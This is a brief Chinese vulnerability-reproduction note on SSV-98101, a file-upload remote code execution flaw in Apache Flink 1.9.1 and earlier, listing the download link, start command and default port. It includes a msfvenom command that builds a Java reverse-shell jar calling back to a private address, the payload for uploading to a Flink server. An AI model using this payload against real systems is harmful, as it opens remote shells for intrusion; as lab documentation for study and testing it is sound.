应用安全

SSV ID:SSV-98101

Date: 2019-11-14

类型: 文件上传导致远程代码执行

影响版本: <= 1.9.1

flink下载:

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

flink安装 - 默认端口:8081

./start-cluster.sh

Shell生成:

msfvenom -p java/shell_reverse_tcp LHOST=192.168.217.1 LPORT=6666 -f jar >shell.jar

 

原文地址:https://www.cnblogs.com/AtesetEnginner/p/11906456.html